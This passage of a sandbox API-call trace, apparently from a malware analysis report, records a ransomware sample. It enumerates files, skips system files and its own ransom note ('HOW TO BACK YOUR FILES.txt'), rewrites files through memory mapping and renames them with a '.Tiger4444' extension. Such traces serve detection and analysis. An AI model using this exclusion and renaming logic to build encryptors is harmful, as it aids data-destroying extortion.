dwFlags=0x0, lpMem=0xc75348 | out: hHeap=0xc50000) returned 1 [0052.627] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75348 [0052.627] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75348 | out: hHeap=0xc50000) returned 1 [0052.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75278 [0052.634] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75278 | out: hHeap=0xc50000) returned 1 [0052.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75248 [0052.634] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75248 | out: hHeap=0xc50000) returned 1 [0052.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753b8 [0052.634] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753b8 | out: hHeap=0xc50000) returned 1 [0052.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0052.634] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0052.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0052.634] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0052.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752c8 [0052.634] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752c8 | out: hHeap=0xc50000) returned 1 [0052.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75358 [0052.634] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75358 | out: hHeap=0xc50000) returned 1 [0052.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75208 [0052.634] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75208 | out: hHeap=0xc50000) returned 1 [0052.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75268 [0052.634] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75268 | out: hHeap=0xc50000) returned 1 [0052.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75318 [0052.634] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75318 | out: hHeap=0xc50000) returned 1 [0052.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752a8 [0052.634] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752a8 | out: hHeap=0xc50000) returned 1 [0052.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752b8 [0052.634] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752b8 | out: hHeap=0xc50000) returned 1 [0052.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75248 [0052.634] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75248 | out: hHeap=0xc50000) returned 1 [0052.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75398 [0052.634] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75398 | out: hHeap=0xc50000) returned 1 [0052.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753f8 [0052.634] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753f8 | out: hHeap=0xc50000) returned 1 [0052.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752a8 [0052.634] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752a8 | out: hHeap=0xc50000) returned 1 [0052.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75398 [0052.634] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75398 | out: hHeap=0xc50000) returned 1 [0052.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75328 [0052.634] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75328 | out: hHeap=0xc50000) returned 1 [0052.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0052.635] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0052.635] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75248 [0052.635] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75248 | out: hHeap=0xc50000) returned 1 [0052.635] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75318 [0052.635] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75318 | out: hHeap=0xc50000) returned 1 [0052.635] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0052.635] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0052.635] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75278 [0052.635] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75278 | out: hHeap=0xc50000) returned 1 [0052.635] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753f8 [0052.635] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753f8 | out: hHeap=0xc50000) returned 1 [0052.635] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0052.635] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0052.635] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753b8 [0052.635] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753b8 | out: hHeap=0xc50000) returned 1 [0052.635] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0052.635] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0052.635] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753c8 [0052.635] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753c8 | out: hHeap=0xc50000) returned 1 [0052.635] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0052.635] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0052.635] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75388 [0052.635] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75388 | out: hHeap=0xc50000) returned 1 [0052.635] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752b8 [0052.635] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752b8 | out: hHeap=0xc50000) returned 1 [0052.635] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0052.635] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0052.635] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75268 [0052.635] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75268 | out: hHeap=0xc50000) returned 1 [0052.635] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753f8 [0052.635] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753f8 | out: hHeap=0xc50000) returned 1 [0052.635] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75208 [0052.635] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75208 | out: hHeap=0xc50000) returned 1 [0052.635] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752a8 [0052.635] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752a8 | out: hHeap=0xc50000) returned 1 [0052.635] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc86fb8 | out: hHeap=0xc50000) returned 1 [0052.635] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8f2e8 | out: hHeap=0xc50000) returned 1 [0052.635] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc871c8 | out: hHeap=0xc50000) returned 1 [0052.635] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8f4f8 | out: hHeap=0xc50000) returned 1 [0052.635] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73cc0 | out: hHeap=0xc50000) returned 1 [0052.636] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0052.636] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0052.636] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0052.636] QueryPerformanceCounter (in: lpPerformanceCount=0x2fabd30 | out: lpPerformanceCount=0x2fabd30*=14408890184) returned 1 [0052.636] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0052.636] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d08 | out: hHeap=0xc50000) returned 1 [0052.636] UnmapViewOfFile (lpBaseAddress=0xc30000) returned 1 [0052.637] CloseHandle (hObject=0x2b8) returned 1 [0052.637] CloseHandle (hObject=0x2a8) returned 1 [0052.637] wsprintfW (in: param_1=0x2fac030, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\i386\\BiosBlocks.xml.Tiger4444") returned 59 [0052.637] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\i386\\BiosBlocks.xml" (normalized: "c:\\windows10upgrade\\resources\\i386\\biosblocks.xml"), lpNewFileName="C:\\Windows10Upgrade\\resources\\i386\\BiosBlocks.xml.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\i386\\biosblocks.xml.tiger4444"), dwFlags=0x1) returned 1 [0052.638] InterlockedExchangeAdd (in: Addend=0xc6f5e8, Value=91648 | out: Addend=0xc6f5e8) returned 0 [0052.638] InterlockedExchangeAdd (in: Addend=0xc6f5f4, Value=918 | out: Addend=0xc6f5f4) returned 0 [0052.638] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x2fadd50 | out: lpFindFileData=0x2fadd50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3ac6e0, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3ac6e0, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x4071, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwcompat.txt", cAlternateFileName="")) returned 1 [0052.638] lstrcmpiW (lpString1="hwcompat.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.638] lstrcmpiW (lpString1="hwcompat.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.638] lstrcmpiW (lpString1="hwcompat.txt", lpString2="Tiger4444.exe") returned -1 [0052.638] lstrcmpiW (lpString1="hwcompat.txt", lpString2=".") returned 1 [0052.638] lstrcmpiW (lpString1="hwcompat.txt", lpString2="..") returned 1 [0052.638] lstrcmpiW (lpString1="hwcompat.txt", lpString2="windows") returned -1 [0052.638] lstrcmpiW (lpString1="hwcompat.txt", lpString2="bootmgr") returned 1 [0052.638] lstrcmpiW (lpString1="hwcompat.txt", lpString2="pagefile.sys") returned -1 [0052.638] lstrcmpiW (lpString1="hwcompat.txt", lpString2="boot") returned 1 [0052.638] lstrcmpiW (lpString1="hwcompat.txt", lpString2="ids.txt") returned -1 [0052.638] lstrcmpiW (lpString1="hwcompat.txt", lpString2="NTUSER.DAT") returned -1 [0052.638] lstrcpyW (in: lpString1=0x2fae8e6, lpString2="hwcompat.txt" | out: lpString1="hwcompat.txt") returned="hwcompat.txt" [0052.638] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\hwcompat.txt", dwFileAttributes=0x0) returned 1 [0052.638] lstrlenW (lpString="hwcompat.txt") returned 12 [0052.638] lstrlenW (lpString="Tiger4444") returned 9 [0052.638] lstrcmpiW (lpString1="ompat.txt", lpString2="Tiger4444") returned -1 [0052.639] lstrlenW (lpString=".dll") returned 4 [0052.639] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0052.639] lstrlenW (lpString=".lnk") returned 4 [0052.639] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0052.639] lstrlenW (lpString=".ini") returned 4 [0052.639] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0052.639] lstrlenW (lpString=".sys") returned 4 [0052.639] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0052.639] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\hwcompat.txt" (normalized: "c:\\windows10upgrade\\resources\\i386\\hwcompat.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a8 [0052.639] QueryPerformanceFrequency (in: lpFrequency=0x2fabd20 | out: lpFrequency=0x2fabd20*=100000000) returned 1 [0052.639] QueryPerformanceCounter (in: lpPerformanceCount=0x2fabd28 | out: lpPerformanceCount=0x2fabd28*=14409212462) returned 1 [0052.639] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x2fabd80 | out: lpFileSize=0x2fabd80*=16497) returned 1 [0052.639] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0052.639] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71c80 [0052.639] CreateFileMappingW (hFile=0x2a8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4380, lpName=0x0) returned 0x2b8 [0052.640] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4380) returned 0xbe0000 [0052.678] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc89ff8 [0052.678] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0052.678] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ff8 | out: hHeap=0xc50000) returned 1 [0052.678] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0052.678] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0052.679] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0052.679] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0052.679] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0052.679] QueryPerformanceCounter (in: lpPerformanceCount=0x2fabd30 | out: lpPerformanceCount=0x2fabd30*=14413191019) returned 1 [0052.679] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0052.679] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71c80 | out: hHeap=0xc50000) returned 1 [0052.679] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.679] CloseHandle (hObject=0x2b8) returned 1 [0052.679] CloseHandle (hObject=0x2a8) returned 1 [0052.679] wsprintfW (in: param_1=0x2fac030, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\i386\\hwcompat.txt.Tiger4444") returned 57 [0052.679] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\i386\\hwcompat.txt" (normalized: "c:\\windows10upgrade\\resources\\i386\\hwcompat.txt"), lpNewFileName="C:\\Windows10Upgrade\\resources\\i386\\hwcompat.txt.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\i386\\hwcompat.txt.tiger4444"), dwFlags=0x1) returned 1 [0052.680] InterlockedExchangeAdd (in: Addend=0xc6f5e8, Value=16512 | out: Addend=0xc6f5e8) returned 91648 [0052.680] InterlockedExchangeAdd (in: Addend=0xc6f5f4, Value=39 | out: Addend=0xc6f5f4) returned 918 [0052.680] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x2fadd50 | out: lpFindFileData=0x2fadd50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3ada69, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3ada69, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x8d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwexclude.txt", cAlternateFileName="HWEXCL~1.TXT")) returned 1 [0052.680] lstrcmpiW (lpString1="hwexclude.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.680] lstrcmpiW (lpString1="hwexclude.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.681] lstrcmpiW (lpString1="hwexclude.txt", lpString2="Tiger4444.exe") returned -1 [0052.681] lstrcmpiW (lpString1="hwexclude.txt", lpString2=".") returned 1 [0052.683] lstrcmpiW (lpString1="hwexclude.txt", lpString2="..") returned 1 [0052.683] lstrcmpiW (lpString1="hwexclude.txt", lpString2="windows") returned -1 [0052.683] lstrcmpiW (lpString1="hwexclude.txt", lpString2="bootmgr") returned 1 [0052.689] lstrcmpiW (lpString1="hwexclude.txt", lpString2="pagefile.sys") returned -1 [0052.695] lstrcmpiW (lpString1="hwexclude.txt", lpString2="boot") returned 1 [0052.696] lstrcmpiW (lpString1="hwexclude.txt", lpString2="ids.txt") returned -1 [0052.697] lstrcmpiW (lpString1="hwexclude.txt", lpString2="NTUSER.DAT") returned -1 [0052.697] lstrcpyW (in: lpString1=0x2fae8e6, lpString2="hwexclude.txt" | out: lpString1="hwexclude.txt") returned="hwexclude.txt" [0052.697] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\hwexclude.txt", dwFileAttributes=0x0) returned 1 [0052.723] lstrlenW (lpString="hwexclude.txt") returned 13 [0052.723] lstrlenW (lpString="Tiger4444") returned 9 [0052.723] lstrcmpiW (lpString1="clude.txt", lpString2="Tiger4444") returned -1 [0052.723] lstrlenW (lpString=".dll") returned 4 [0052.723] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0052.723] lstrlenW (lpString=".lnk") returned 4 [0052.723] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0052.723] lstrlenW (lpString=".ini") returned 4 [0052.723] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0052.723] lstrlenW (lpString=".sys") returned 4 [0052.723] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0052.723] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\hwexclude.txt" (normalized: "c:\\windows10upgrade\\resources\\i386\\hwexclude.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0052.723] QueryPerformanceFrequency (in: lpFrequency=0x2fabd20 | out: lpFrequency=0x2fabd20*=100000000) returned 1 [0052.723] QueryPerformanceCounter (in: lpPerformanceCount=0x2fabd28 | out: lpPerformanceCount=0x2fabd28*=14417662101) returned 1 [0052.724] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x2fabd80 | out: lpFileSize=0x2fabd80*=2263) returned 1 [0052.724] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0052.724] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71730 [0052.724] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xbe0, lpName=0x0) returned 0x2ac [0052.786] MapViewOfFile (hFileMappingObject=0x2ac, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbe0) returned 0xbe0000 [0052.807] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc89ff8 [0052.807] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0052.807] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ff8 | out: hHeap=0xc50000) returned 1 [0052.807] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0052.807] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0052.807] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0052.807] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0052.807] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0052.807] QueryPerformanceCounter (in: lpPerformanceCount=0x2fabd30 | out: lpPerformanceCount=0x2fabd30*=14426029382) returned 1 [0052.807] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0052.807] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71730 | out: hHeap=0xc50000) returned 1 [0052.807] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.807] CloseHandle (hObject=0x2ac) returned 1 [0052.807] CloseHandle (hObject=0x2c8) returned 1 [0052.807] wsprintfW (in: param_1=0x2fac030, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\i386\\hwexclude.txt.Tiger4444") returned 58 [0052.808] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\i386\\hwexclude.txt" (normalized: "c:\\windows10upgrade\\resources\\i386\\hwexclude.txt"), lpNewFileName="C:\\Windows10Upgrade\\resources\\i386\\hwexclude.txt.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\i386\\hwexclude.txt.tiger4444"), dwFlags=0x1) returned 1 [0052.808] InterlockedExchangeAdd (in: Addend=0xc6f5e8, Value=2272 | out: Addend=0xc6f5e8) returned 108160 [0052.808] InterlockedExchangeAdd (in: Addend=0xc6f5f4, Value=83 | out: Addend=0xc6f5f4) returned 957 [0052.808] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x2fadd50 | out: lpFindFileData=0x2fadd50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3aedef, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3aedef, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x2684, dwReserved0=0x0, dwReserved1=0x0, cFileName="nxquery.cat", cAlternateFileName="")) returned 1 [0052.808] lstrcmpiW (lpString1="nxquery.cat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.808] lstrcmpiW (lpString1="nxquery.cat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.808] lstrcmpiW (lpString1="nxquery.cat", lpString2="Tiger4444.exe") returned -1 [0052.808] lstrcmpiW (lpString1="nxquery.cat", lpString2=".") returned 1 [0052.808] lstrcmpiW (lpString1="nxquery.cat", lpString2="..") returned 1 [0052.808] lstrcmpiW (lpString1="nxquery.cat", lpString2="windows") returned -1 [0052.808] lstrcmpiW (lpString1="nxquery.cat", lpString2="bootmgr") returned 1 [0052.808] lstrcmpiW (lpString1="nxquery.cat", lpString2="pagefile.sys") returned -1 [0052.808] lstrcmpiW (lpString1="nxquery.cat", lpString2="boot") returned 1 [0052.808] lstrcmpiW (lpString1="nxquery.cat", lpString2="ids.txt") returned 1 [0052.808] lstrcmpiW (lpString1="nxquery.cat", lpString2="NTUSER.DAT") returned 1 [0052.808] lstrcpyW (in: lpString1=0x2fae8e6, lpString2="nxquery.cat" | out: lpString1="nxquery.cat") returned="nxquery.cat" [0052.809] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\nxquery.cat", dwFileAttributes=0x0) returned 1 [0052.809] lstrlenW (lpString="nxquery.cat") returned 11 [0052.809] lstrlenW (lpString="Tiger4444") returned 9 [0052.809] lstrcmpiW (lpString1="query.cat", lpString2="Tiger4444") returned -1 [0052.809] lstrlenW (lpString=".dll") returned 4 [0052.809] lstrcmpiW (lpString1=".cat", lpString2=".dll") returned -1 [0052.809] lstrlenW (lpString=".lnk") returned 4 [0052.809] lstrcmpiW (lpString1=".cat", lpString2=".lnk") returned -1 [0052.809] lstrlenW (lpString=".ini") returned 4 [0052.809] lstrcmpiW (lpString1=".cat", lpString2=".ini") returned -1 [0052.809] lstrlenW (lpString=".sys") returned 4 [0052.809] lstrcmpiW (lpString1=".cat", lpString2=".sys") returned -1 [0052.809] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\nxquery.cat" (normalized: "c:\\windows10upgrade\\resources\\i386\\nxquery.cat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0052.809] QueryPerformanceFrequency (in: lpFrequency=0x2fabd20 | out: lpFrequency=0x2fabd20*=100000000) returned 1 [0052.809] QueryPerformanceCounter (in: lpPerformanceCount=0x2fabd28 | out: lpPerformanceCount=0x2fabd28*=14426234944) returned 1 [0052.809] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x2fabd80 | out: lpFileSize=0x2fabd80*=9860) returned 1 [0052.809] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0052.809] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72148 [0052.809] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2990, lpName=0x0) returned 0x2ac [0052.810] MapViewOfFile (hFileMappingObject=0x2ac, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2990) returned 0xbe0000 [0052.817] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc89ff8 [0052.817] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0052.817] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ff8 | out: hHeap=0xc50000) returned 1 [0052.817] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0052.817] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0052.818] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0052.818] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0052.818] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0052.818] QueryPerformanceCounter (in: lpPerformanceCount=0x2fabd30 | out: lpPerformanceCount=0x2fabd30*=14427084216) returned 1 [0052.818] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0052.818] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72148 | out: hHeap=0xc50000) returned 1 [0052.818] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.818] CloseHandle (hObject=0x2ac) returned 1 [0052.818] CloseHandle (hObject=0x2c8) returned 1 [0052.818] wsprintfW (in: 